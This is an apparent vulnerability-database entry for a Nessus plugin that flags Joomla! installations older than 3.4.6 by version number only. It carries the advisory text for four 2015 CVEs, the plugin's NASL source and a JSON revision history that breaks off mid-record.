ID JOOMLA_346.NASL Type nessus Reporter This script is Copyright (C) 2015-2019 and is owned by Tenable, Inc. or an Affiliate thereof. Modified 2019-12-02T00:00:00
Description
According to its self-reported version number, the Joomla!
installation running on the remote web server is prior to 3.4.6. It
is, therefore, affected by multiple vulnerabilities :
A remote code execution vulnerability exists due to
improper sanitization of session values. An
unauthenticated, remote attacker can exploit this to
execute arbitrary code. (CVE-2015-8562)
A cross-site request forgery (XSRF) vulnerability exists
due to HTTP requests to com_templates not requiring
multiple steps, explicit confirmation, or a unique token
when performing certain sensitive actions. An
unauthenticated, remote attacker can exploit this, by
convincing a user to follow a specially crafted link, to
cause the user to perform unspecified actions.
(CVE-2015-8563)
A path traversal vulnerability exists due to improper
sanitization of user-supplied input via the XML install
file. (CVE-2015-8564)
A path traversal vulnerability exists due to improper
sanitization of input supplied via user requests.
(CVE-2015-8565)
Note that Nessus has not tested for these issues but has instead
relied only on the application
#
# (C) Tenable Network Security, Inc.
#
include("compat.inc");
if (description)
{
script_id(87416);
script_version("1.14");
script_cvs_date("Date: 2019/11/20");
script_cve_id(
"CVE-2015-8562",
"CVE-2015-8563",
"CVE-2015-8564",
"CVE-2015-8565"
);
script_bugtraq_id(
79195,
79199,
79201,
79203
);
script_xref(name:"EDB-ID", value:"38977");
script_xref(name:"EDB-ID", value:"39033");
script_name(english:"Joomla! < 3.4.6 Multiple Vulnerabilities");
script_summary(english:"Checks the version of Joomla!.");
script_set_attribute(attribute:"synopsis", value:
"The remote web server contains a PHP application that is affected by
multiple vulnerabilities.");
script_set_attribute(attribute:"description", value:
"According to its self-reported version number, the Joomla!
installation running on the remote web server is prior to 3.4.6. It
is, therefore, affected by multiple vulnerabilities :
- A remote code execution vulnerability exists due to
improper sanitization of session values. An
unauthenticated, remote attacker can exploit this to
execute arbitrary code. (CVE-2015-8562)
- A cross-site request forgery (XSRF) vulnerability exists
due to HTTP requests to com_templates not requiring
multiple steps, explicit confirmation, or a unique token
when performing certain sensitive actions. An
unauthenticated, remote attacker can exploit this, by
convincing a user to follow a specially crafted link, to
cause the user to perform unspecified actions.
(CVE-2015-8563)
- A path traversal vulnerability exists due to improper
sanitization of user-supplied input via the XML install
file. (CVE-2015-8564)
- A path traversal vulnerability exists due to improper
sanitization of input supplied via user requests.
(CVE-2015-8565)
Note that Nessus has not tested for these issues but has instead
relied only on the application's self-reported version number.");
# https://www.joomla.org/announcements/release-news/5641-joomla-3-4-6-released.html
script_set_attribute(attribute:"see_also", value:"http://www.nessus.org/u?b06a8fbc");
script_set_attribute(attribute:"solution", value:
"Upgrade to Joomla! version 3.4.6 or later.");
script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P");
script_set_cvss_temporal_vector("CVSS2#E:F/RL:OF/RC:ND");
script_set_cvss3_base_vector("CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H");
script_set_cvss3_temporal_vector("CVSS:3.0/E:F/RL:O/RC:X");
script_set_attribute(attribute:"cvss_score_source", value:"CVE-2015-8565");
script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
script_set_attribute(attribute:"exploit_available", value:"true");
script_set_attribute(attribute:"exploit_framework_core", value:"true");
script_set_attribute(attribute:"metasploit_name", value:'Joomla HTTP Header Unauthenticated Remote Code Execution');
script_set_attribute(attribute:"exploit_framework_metasploit", value:"true");
script_set_attribute(attribute:"exploit_framework_canvas", value:"true");
script_set_attribute(attribute:"canvas_package", value:'CANVAS');
script_set_attribute(attribute:"vuln_publication_date", value:"2015/12/14");
script_set_attribute(attribute:"patch_publication_date", value:"2015/12/14");
script_set_attribute(attribute:"plugin_publication_date", value:"2015/12/16");
script_set_attribute(attribute:"potential_vulnerability", value:"true");
script_set_attribute(attribute:"plugin_type", value:"remote");
script_set_attribute(attribute:"cpe", value:"cpe:/a:joomla:joomla\!");
script_end_attributes();
script_category(ACT_GATHER_INFO);
script_family(english:"CGI abuses");
script_copyright(english:"This script is Copyright (C) 2015-2019 and is owned by Tenable, Inc. or an Affiliate thereof.");
script_dependencies("joomla_detect.nasl");
script_require_keys("installed_sw/Joomla!", "www/PHP", "Settings/ParanoidReport");
script_require_ports("Services/www", 80);
exit(0);
}
include("audit.inc");
include("global_settings.inc");
include("misc_func.inc");
include("http.inc");
include("install_func.inc");
app = "Joomla!";
get_install_count(app_name:app, exit_if_zero:TRUE);
port = get_http_port(default:80, php:TRUE);
install = get_single_install(
app_name : app,
port : port,
exit_if_unknown_ver : TRUE
);
if (report_paranoia < 2) audit(AUDIT_PARANOID);
version = install['version'];
install_loc = build_url(port:port, qs:install['path']);
fix = "3.4.6";
# Pull out the purely numeric version
numeric = eregmatch(string:version, pattern:"^([0-9\.]+)($|[^0-9])");
if (empty_or_null(numeric))
audit(AUDIT_UNKNOWN_WEB_APP_VER, app, install_loc);
numeric = numeric[1];
if (numeric == "3.4")
audit(AUDIT_VER_NOT_GRANULAR, app, version);
# Version 1.5.0 - 3.4.5 vulnerable to RCE
if (ver_compare(ver:numeric, fix:"1.5.0", strict:FALSE) >= 0 &&
ver_compare(ver:numeric, fix:fix, strict:FALSE) < 0)
{
order = make_list("URL", "Installed version", "Fixed version");
report = make_array(
order[0], install_loc,
order[1], version,
order[2], fix
);
report = report_items_str(report_items:report, ordered_fields:order);
security_report_v4(port:port, extra:report, severity:SECURITY_HOLE, xsrf:TRUE);
exit(0);
}
else audit(AUDIT_WEB_APP_NOT_AFFECTED, app, install_loc, version);
{"id": "JOOMLA_346.NASL", "bulletinFamily": "scanner", "title": "Joomla! < 3.4.6 Multiple Vulnerabilities", "description": "According to its self-reported version number, the Joomla!\ninstallation running on the remote web server is prior to 3.4.6. It\nis, therefore, affected by multiple vulnerabilities :\n\n - A remote code execution vulnerability exists due to\n improper sanitization of session values. An\n unauthenticated, remote attacker can exploit this to\n execute arbitrary code. (CVE-2015-8562)\n\n - A cross-site request forgery (XSRF) vulnerability exists\n due to HTTP requests to com_templates not requiring\n multiple steps, explicit confirmation, or a unique token\n when performing certain sensitive actions. An\n unauthenticated, remote attacker can exploit this, by\n convincing a user to follow a specially crafted link, to\n cause the user to perform unspecified actions.\n (CVE-2015-8563)\n\n - A path traversal vulnerability exists due to improper\n sanitization of user-supplied input via the XML install\n file. (CVE-2015-8564)\n\n - A path traversal vulnerability exists due to improper\n sanitization of input supplied via user requests.\n (CVE-2015-8565)\n\nNote that Nessus has not tested for these issues but has instead\nrelied only on the application", "published": "2015-12-16T00:00:00", "modified": "2019-12-02T00:00:00", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "href": "https://www.tenable.com/plugins/nessus/87416", "reporter": "This script is Copyright (C) 2015-2019 and is owned by Tenable, Inc. or an Affiliate thereof.", "references": ["http://www.nessus.org/u?b06a8fbc"], "cvelist": ["CVE-2015-8565", "CVE-2015-8564", "CVE-2015-8563", "CVE-2015-8562"], "type": "nessus", "lastseen": "2019-12-13T07:51:53", "history": [{"bulletin": {"bulletinFamily": "scanner", "cpe": ["cpe:/a:joomla:joomla\\!"], "cvelist": ["CVE-2015-8565", "CVE-2015-8564", "CVE-2015-8563", "CVE-2015-8562"], "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "description": "According to its self-reported version number, the Joomla!\ninstallation running on the remote web server is prior to 3.4.6. It\nis, therefore, affected by multiple vulnerabilities :\n\n - A remote code execution vulnerability exists due to\n improper sanitization of session values. An\n unauthenticated, remote attacker can exploit this to\n execute arbitrary code. (CVE-2015-8562)\n\n - A cross-site request forgery (XSRF) vulnerability exists\n due to HTTP requests to com_templates not requiring\n multiple steps, explicit confirmation, or a unique token\n when performing certain sensitive actions. An\n unauthenticated, remote attacker can exploit this, by\n convincing a user to follow a specially crafted link, to\n cause the user to perform unspecified actions.\n (CVE-2015-8563)\n\n - A path traversal vulnerability exists due to improper\n sanitization of user-supplied input via the XML install\n file. (CVE-2015-8564)\n\n - A path traversal vulnerability exists due to improper\n sanitization of input supplied via user requests.\n (CVE-2015-8565)\n\nNote that Nessus has not tested for these issues but has instead\nrelied only on the application", "edition": 14, "enchantments": {"dependencies": {"modified": "2019-11-22T02:48:10", "references": [{"idList": ["CVE-2015-8565", "CVE-2015-8564", "CVE-2015-8563", "CVE-2015-8562"], "type": "cve"}, {"idList": ["SAINT:150A052478728FE6FC97F9B52382B525", "SAINT:C6AA8FC60EF73B444D044C4F52877D2B", "SAINT:1E0BFF3A5AC9A780E289B143FCC5F23A"], "type": "saint"}, {"idList": ["1337DAY-ID-24758", "1337DAY-ID-24763"], "type": "zdt"}, {"idList": ["A9F60CE8-A4E0-11E5-B864-14DAE9D210B8"], "type": "freebsd"}, {"idList": ["JOOMLA-634", "JOOMLA-630", "JOOMLA-633", "JOOMLA-635"], "type": "joomla"}, {"idList": ["MSF:EXPLOIT/MULTI/HTTP/JOOMLA_HTTP_HEADER_RCE"], "type": "metasploit"}, {"idList": ["OPENVAS:1361412562310105486", "OPENVAS:1361412562310105487"], "type": "openvas"}, {"idList": ["JOOMLA_347.NASL", "FREEBSD_PKG_A9F60CE8A4E011E5B86414DAE9D210B8.NASL", "JOOMLA_OBJECT_INJECTION.NASL"], "type": "nessus"}, {"idList": ["IMPERVABLOG:F2DBFC086ED3B70700CD22E02FB39FC8"], "type": "impervablog"}, {"idList": ["EDB-ID:39033", "EDB-ID:38977"], "type": "exploitdb"}, {"idList": ["JOOMLA_SESSION_UNSERIALIZE"], "type": "canvas"}, {"idList": ["THREATPOST:9475C86517671FDF8D35E7E89FB91463"], "type": "threatpost"}, {"idList": ["PACKETSTORM:135100", "PACKETSTORM:134949"], "type": "packetstorm"}]}, "score": {"modified": "2019-11-22T02:48:10", "value": 7.4, "vector": "NONE"}}, "hash": "3f5219b200bdc0cf769fdea63a35f3f992bb567449d4d34835bc77687d42f0c0", "hashmap": [{"hash": "a67b72711b557eaa1cb901087a882768", "key": "description"}, {"hash": "3bbb9f1695f78e751a165135d1e6933f", "key": "references"}, {"hash": "abcf9266f425f12dda38f529cd4a94bc", "key": "modified"}, {"hash": "9c95562c2b2059addaa39c0c8952b1ea", "key": "sourceData"}, {"hash": "f0c058e0d7789cc02544fb074c2ebeb8", "key": "href"}, {"hash": "fe431d002c3234b19fc0c7c4c23ca999", "key": "published"}, {"hash": "f82feb6b55f329a4801a7908bc18a9d6", "key": "reporter"}, {"hash": "6d1c534dc9bfdb4206c06293dcccafda", "key": "cpe"}, {"hash": "6f971b8a5752c9a4a44306db39282683", "key": "pluginID"}, {"hash": "bbdaea376f500d25f6b0c1050311dd07", "key": "bulletinFamily"}, {"hash": "5e0bd03bec244039678f2b955a2595aa", "key": "type"}, {"hash": "e7b4b8d462ef6ff4a4efa192ec0c3507", "key": "title"}, {"hash": "07948b8ff59e8dda0b01012f70f00327", "key": "naslFamily"}, {"hash": "871c430e5e5dff2841813e7218c22d5c", "key": "cvelist"}, {"hash": "0b053db5674b87efff89989a8a720df3", "key": "cvss"}], "history": [], "href": "https://www.tenable.com/plugins/nessus/87416", "id": "JOOMLA_346.NASL", "lastseen": "2019-11-22T02:48:10", "modified": "2019-11-02T00:00:00", "naslFamily": "CGI abuses", "objectVersion": "1.3", "pluginID": "87416", "published": "2015-12-16T00:00:00", "references": ["http://www.nessus.org/u?b06a8fbc"], "reporter": "This script is Copyright (C) 2015-2019 and is owned by Tenable, Inc. or an Affiliate thereof.", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(87416);\n script_version(\"1.14\");\n script_cvs_date(\"Date: 2019/11/20\");\n\n script_cve_id(\n \"CVE-2015-8562\",\n \"CVE-2015-8563\",\n \"CVE-2015-8564\",\n \"CVE-2015-8565\"\n );\n script_bugtraq_id(\n 79195,\n 79199,\n 79201,\n 79203\n );\n script_xref(name:\"EDB-ID\", value:\"38977\");\n script_xref(name:\"EDB-ID\", value:\"39033\");\n\n script_name(english:\"Joomla! < 3.4.6 Multiple Vulnerabilities\");\n script_summary(english:\"Checks the version of Joomla!.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote web server contains a PHP application that is affected by\nmultiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its self-reported version number, the Joomla!\ninstallation running on the remote web server is prior to 3.4.6. It\nis, therefore, affected by multiple vulnerabilities :\n\n - A remote code execution vulnerability exists due to\n improper sanitization of session values. An\n unauthenticated, remote attacker can exploit this to\n execute arbitrary code. (CVE-2015-8562)\n\n - A cross-site request forgery (XSRF) vulnerability exists\n due to HTTP requests to com_templates not requiring\n multiple steps, explicit confirmation, or a unique token\n when performing certain sensitive actions. An\n unauthenticated, remote attacker can exploit this, by\n convincing a user to follow a specially crafted link, to\n cause the user to perform unspecified actions.\n (CVE-2015-8563)\n\n - A path traversal vulnerability exists due to improper\n sanitization of user-supplied input via the XML install\n file. (CVE-2015-8564)\n\n - A path traversal vulnerability exists due to improper\n sanitization of input supplied via user requests.\n (CVE-2015-8565)\n\nNote that Nessus has not tested for these issues but has instead\nrelied only on the application's self-reported version number.\");\n # https://www.joomla.org/announcements/release-news/5641-joomla-3-4-6-released.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?b06a8fbc\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Joomla! version 3.4.6 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:ND\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:X\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2015-8565\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Joomla HTTP Header Unauthenticated Remote Code Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2015/12/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/12/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/12/16\");\n\n script_set_attribute(attribute:\"potential_vulnerability\", value:\"true\");\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:joomla:joomla\\!\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2015-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"joomla_detect.nasl\");\n script_require_keys(\"installed_sw/Joomla!\", \"www/PHP\", \"Settings/ParanoidReport\");\n script_require_ports(\"Services/www\", 80);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\ninclude(\"install_func.inc\");\n\napp = \"Joomla!\";\nget_install_count(app_name:app, exit_if_zero:TRUE);\n\nport = get_http_port(default:80, php:TRUE);\n\ninstall = get_single_install(\n app_name : app,\n port : port,\n exit_if_unknown_ver : TRUE\n);\n\nif (report_paranoia < 2) audit(AUDIT_PARANOID);\n\nversion = install['version'];\ninstall_loc = build_url(port:port, qs:install['path']);\nfix = \"3.4.6\";\n\n# Pull out the purely numeric version\nnumeric = eregmatch(string:version, pattern:\"^([0-9\\.]+)($|[^0-9])\");\n\nif (empty_or_null(numeric))\n audit(AUDIT_UNKNOWN_WEB_APP_VER, app, install_loc);\n\nnumeric = numeric[1];\n\nif (numeric == \"3.4\")\n audit(AUDIT_VER_NOT_GRANULAR, app, version);\n\n# Version 1.5.0 - 3.4.5 vulnerable to RCE\nif (ver_compare(ver:numeric, fix:\"1.5.0\", strict:FALSE) >= 0 &&\n ver_compare(ver:numeric, fix:fix, strict:FALSE) < 0)\n{\n order = make_list(\"URL\", \"Installed version\", \"Fixed version\");\n report = make_array(\n order[0], install_loc,\n order[1], version,\n order[2], fix\n );\n report = report_items_str(report_items:report, ordered_fields:order);\n\n security_report_v4(port:port, extra:report, severity:SECURITY_HOLE, xsrf:TRUE);\n exit(0);\n}\nelse audit(AUDIT_WEB_APP_NOT_AFFECTED, app, install_loc, version);\n", "title": "Joomla! < 3.4.6 Multiple Vulnerabilities", "type": "nessus", "viewCount": 27}, "differentElements": ["modified"], "edition": 14, "lastseen": "2019-11-22T02:48:10"}, {"bulletin": {"bulletinFamily": "exploit", "cvelist": ["CVE-2015-8565", "CVE-2015-8564", "CVE-2015-8563", "CVE-2015-8562"], "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "description": "According to its self-reported version number, the Joomla! application running on the remote web server is prior to 3.4.6. It is, therefore, affected by multiple vulnerabilities :\n\n - A remote code execution vulnerability exists due to improper sanitization of session values. An unauthenticated, remote attacker can exploit this to execute arbitrary code. (CVE-2015-8562)\n\n - A cross-site request forgery vulnerability exists due to HTTP requests to com_templates not requiring multiple steps, explicit confirmation, or a unique token when performing certain sensitive actions. An unauthenticated, remote attacker can exploit this by convincing a user to follow a specially crafted link, to cause the user to perform unspecified actions.\n (CVE-2015-8563)\n\n - A path traversal vulnerability exists due to improper sanitization of user-supplied input via the XML install file. (CVE-2015-8564)\n\n - A path traversal vulnerability exists due to improper sanitization of input supplied via user requests.\n (CVE-2015-8565)\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version number.", "edition": 1, "hash": "ff349ff8f1961e4d6d8b7df358f8622ac936768a593d29ac11c525e05af4f05e", "hashmap": [{"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "3bbb9f1695f78e751a165135d1e6933f", "key": "references"}, {"hash": "56765472680401499c79732468ba4340", "key": "objectVersion"}, {"hash": "9cf00d658b687f030ebe173a0528c567", "key": "reporter"}, {"hash": "e5d275b3ebd62646b78320753699e02e", "key": "cvss"}, {"hash": "948d610586ec8a1d610de65c4645d11f", "key": "modified"}, {"hash": "aa3a806712ec38fbb401419c984cd5ce", "key": "description"}, {"hash": "fe431d002c3234b19fc0c7c4c23ca999", "key": "published"}, {"hash": "6f971b8a5752c9a4a44306db39282683", "key": "pluginID"}, {"hash": "5e0bd03bec244039678f2b955a2595aa", "key": "type"}, {"hash": "e7b4b8d462ef6ff4a4efa192ec0c3507", "key": "title"}, {"hash": "07948b8ff59e8dda0b01012f70f00327", "key": "naslFamily"}, {"hash": "a552e9b06370d4c94153c2d856b54c24", "key": "sourceData"}, {"hash": "871c430e5e5dff2841813e7218c22d5c", "key": "cvelist"}, {"hash": "da65470e1074a8a2b67a229e55366e45", "key": "href"}], "history": [], "href": "https://www.tenable.com/plugins/index.php?view=single&id=87416", "id": "JOOMLA_346.NASL", "lastseen": "2016-09-26T17:24:24", "modified": "2016-06-16T00:00:00", "naslFamily": "CGI abuses", "objectVersion": "1.2", "pluginID": "87416", "published": "2015-12-16T00:00:00", "references": ["http://www.nessus.org/u?b06a8fbc"], "reporter": "Tenable", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(87416);\n script_version(\"$Revision: 1.8 $\");\n script_cvs_date(\"$Date: 2016/06/16 14:58:25 $\");\n\n script_cve_id(\n \"CVE-2015-8562\",\n \"CVE-2015-8563\",\n \"CVE-2015-8564\",\n \"CVE-2015-8565\"\n );\n script_bugtraq_id(\n 79195,\n 79199,\n 79201,\n 79203\n );\n script_osvdb_id(\n 131679,\n 131680,\n 131681,\n 131682\n );\n\n script_name(english:\"Joomla! < 3.4.6 Multiple Vulnerabilities\");\n script_summary(english:\"Checks the version of Joomla!.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote web server hosts a PHP application that is affected by\nmultiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its self-reported version number, the Joomla! application\nrunning on the remote web server is prior to 3.4.6. It is, therefore,\naffected by multiple vulnerabilities :\n\n - A remote code execution vulnerability exists due to\n improper sanitization of session values. An\n unauthenticated, remote attacker can exploit this to\n execute arbitrary code. (CVE-2015-8562)\n\n - A cross-site request forgery vulnerability exists due to\n HTTP requests to com_templates not requiring multiple\n steps, explicit confirmation, or a unique token when\n performing certain sensitive actions. An\n unauthenticated, remote attacker can exploit this by\n convincing a user to follow a specially crafted link, to\n cause the user to perform unspecified actions.\n (CVE-2015-8563)\n\n - A path traversal vulnerability exists due to improper\n sanitization of user-supplied input via the XML install\n file. (CVE-2015-8564)\n\n - A path traversal vulnerability exists due to improper\n sanitization of input supplied via user requests.\n (CVE-2015-8565)\n\nNote that Nessus has not tested for these issues but has instead\nrelied only on the application's self-reported version number.\");\n # https://www.joomla.org/announcements/release-news/5641-joomla-3-4-6-released.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?b06a8fbc\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Joomla! version 3.4.6 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:ND\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Joomla HTTP Header Unauthenticated Remote Code Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2015/12/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/12/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/12/16\");\n\n script_set_attribute(attribute:\"potential_vulnerability\", value:\"true\");\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:joomla:joomla%21\");\n\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2015-2016 Tenable Network Security, Inc.\");\n\n script_dependencies(\"joomla_detect.nasl\");\n script_require_keys(\"www/joomla\",\"www/PHP\", \"Settings/ParanoidReport\");\n script_require_ports(\"Services/www\", 80);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\ninclude(\"webapp_func.inc\");\n\nif (report_paranoia < 2) audit(AUDIT_PARANOID);\n\nport = get_http_port(default:80, php:TRUE);\n\ninstall = get_install_from_kb(\n appname : \"joomla\",\n port : port,\n exit_on_fail : TRUE\n);\n\ndir = install[\"dir\"];\ninstall_loc = build_url(port:port, qs:dir);\nversion = install[\"ver\"];\n\nif (version == UNKNOWN_VER)\n audit(AUDIT_UNKNOWN_WEB_APP_VER, \"Joomla!\", install_loc);\n\n# Pull out the purely numeric version\nnumeric = eregmatch(string:version, pattern:\"^([0-9\\.]+)($|[^0-9])\");\n\nif (empty_or_null(numeric))\n audit(AUDIT_UNKNOWN_WEB_APP_VER, \"Joomla!\", install_loc);\n\nnumeric = numeric[1];\n\nif (numeric == \"3.4\")\n audit(AUDIT_VER_NOT_GRANULAR, \"Joomla!\", version);\n\n# Version 1.5.0 - 3.4.5 vulnerable to RCE\nif (ver_compare(ver:numeric, fix:\"1.5.0\", strict:FALSE) >= 0 &&\n ver_compare(ver:numeric, fix:\"3.4.6\", strict:FALSE) < 0)\n{\n set_kb_item(name: 'www/'+port+'/XSRF', value: TRUE);\n\n if (report_verbosity > 0)\n {\n report =\n '\\n URL : ' +install_loc+\n '\\n Installed version : ' +version+\n '\\n Fixed version : 3.4.6' +\n '\\n';\n security_hole(port:port, extra:report);\n }\n else security_hole(port);\n}\nelse audit(AUDIT_WEB_APP_NOT_AFFECTED, \"Joomla!\", install_loc, version);\n", "title": "Joomla! < 3.4.6 Multiple Vulnerabilities", "type": "nessus", "viewCount": 0}, "differentElements": ["modified", "sourceData"], "edition": 1, "lastseen": "2016-09-26T17:24:24"}, {"bulletin": {"bulletinFamily": "scanner", "cpe": ["cpe:/a:joomla:joomla\\!"], "cvelist": ["CVE-2015-8565", "CVE-2015-8564", "CVE-2015-8563", "CVE-2015-8562"], "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "description": "According to its self-reported version number, the Joomla!\ninstallation running on the remote web server is prior to 3.4.6. It\nis, therefore, affected by multiple vulnerabilities :\n\n - A remote code execution vulnerability exists due to\n improper sanitization of session values. An\n unauthenticated, remote attacker can exploit this to\n execute arbitrary code. (CVE-2015-8562)\n\n - A cross-site request forgery (XSRF) vulnerability exists\n due to HTTP requests to com_templates not requiring\n multiple steps, explicit confirmation, or a unique token\n when performing certain sensitive actions. An\n unauthenticated, remote attacker can exploit this, by\n convincing a user to follow a specially crafted link, to\n cause the user to perform unspecified actions.\n (CVE-2015-8563)\n\n - A path traversal vulnerability exists due to improper\n sanitization of user-supplied input via the XML install\n file. (CVE-2015-8564)\n\n - A path traversal vulnerability exists due to improper\n sanitization of input supplied via user requests.\n (CVE-2015-8565)\n\nNote that Nessus has not tested for these issues but has instead\nrelied only on the application", "edition": 12, "enchantments": {"dependencies": {"modified": "2019-10-28T20:32:08", "references": [{"idList": ["CVE-2015-8565", "CVE-2015-8564", "CVE-2015-8563", "CVE-2015-8562"], "type": "cve"}, {"idList": ["SAINT:150A052478728FE6FC97F9B52382B525", "SAINT:C6AA8FC60EF73B444D044C4F52877D2B", "SAINT:1E0BFF3A5AC9A780E289B143FCC5F23A"], "type": "saint"}, {"idList": ["1337DAY-ID-24758", "1337DAY-ID-24763"], "type": "zdt"}, {"idList": ["A9F60CE8-A4E0-11E5-B864-14DAE9D210B8"], "type": "freebsd"}, {"idList": ["JOOMLA-634", "JOOMLA-630", "JOOMLA-633", "JOOMLA-635"], "type": "joomla"}, {"idList": ["MSF:EXPLOIT/MULTI/HTTP/JOOMLA_HTTP_HEADER_RCE"], "type": "metasploit"}, {"idList": ["OPENVAS:1361412562310105486", "OPENVAS:1361412562310105487"], "type": "openvas"}, {"idList": ["JOOMLA_347.NASL", "FREEBSD_PKG_A9F60CE8A4E011E5B86414DAE9D210B8.NASL", "JOOMLA_OBJECT_INJECTION.NASL"], "type": "nessus"}, {"idList": ["IMPERVABLOG:F2DBFC086ED3B70700CD22E02FB39FC8"], "type": "impervablog"}, {"idList": ["EDB-ID:39033", "EDB-ID:38977"], "type": "exploitdb"}, {"idList": ["JOOMLA_SESSION_UNSERIALIZE"], "type": "canvas"}, {"idList": ["THREATPOST:9475C86517671FDF8D35E7E89FB91463"], "type": "threatpost"}, {"idList": ["PACKETSTORM:135100", "PACKETSTORM:134949"], "type": "packetstorm"}]}, "score": {"modified": "2019-10-28T20:32:08", "value": 7.4, "vector": "NONE"}}, "hash": "094bc0fb21c1ba6481471e7897cebbd9a89076965190d9a76657691444c158f2", "hashmap": [{"hash": "83d85f0b2082533b5c390c185dd3e8ce", "key": "reporter"}, {"hash": "a67b72711b557eaa1cb901087a882768", "key": "description"}, {"hash": "3bbb9f1695f78e751a165135d1e6933f", "key": "references"}, {"hash": "f0c058e0d7789cc02544fb074c2ebeb8", "key": "href"}, {"hash": "fe431d002c3234b19fc0c7c4c23ca999", "key": "published"}, {"hash": "6d1c534dc9bfdb4206c06293dcccafda", "key": "cpe"}, {"hash": "6f971b8a5752c9a4a44306db39282683", "key": "pluginID"}, {"hash": "bbdaea376f500d25f6b0c1050311dd07", "key": "bulletinFamily"}, {"hash": "5e0bd03bec244039678f2b955a2595aa", "key": "type"}, {"hash": "0bafb6325bcaf483a25404f785191cc5", "key": "modified"}, {"hash": "e7b4b8d462ef6ff4a4efa192ec0c3507", "key": "title"}, {"hash": "07948b8ff59e8dda0b01012f70f00327", "key": "naslFamily"}, {"hash": "871c430e5e5dff2841813e7218c22d5c", "key": "cvelist"}, {"hash": "0b053db5674b87efff89989a8a720df3", "key": "cvss"}, {"hash": "491ea03c294b99ddda96efedc9438a01", "key": "sourceData"}], "history": [], "href": "https://www.tenable.com/plugins/nessus/87416", "id": "JOOMLA_346.NASL", "lastseen": "2019-10-28T20:32:08", "modified": "2019-10-02T00:00:00", "naslFamily": "CGI abuses", "objectVersion": "1.3", "pluginID": "87416", "published": "2015-12-16T00:00:00", "references": ["http://www.nessus.org/u?b06a8fbc"], "reporter": "This script is Copyright (C) 2015-2018 Tenable Network Security, Inc.", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(87416);\n script_version(\"1.13\");\n script_cvs_date(\"Date: 2018/06/13 18:56:27\");\n\n script_cve_id(\n \"CVE-2015-8562\",\n \"CVE-2015-8563\",\n \"CVE-2015-8564\",\n \"CVE-2015-8565\"\n );\n script_bugtraq_id(\n 79195,\n 79199,\n 79201,\n 79203\n );\n 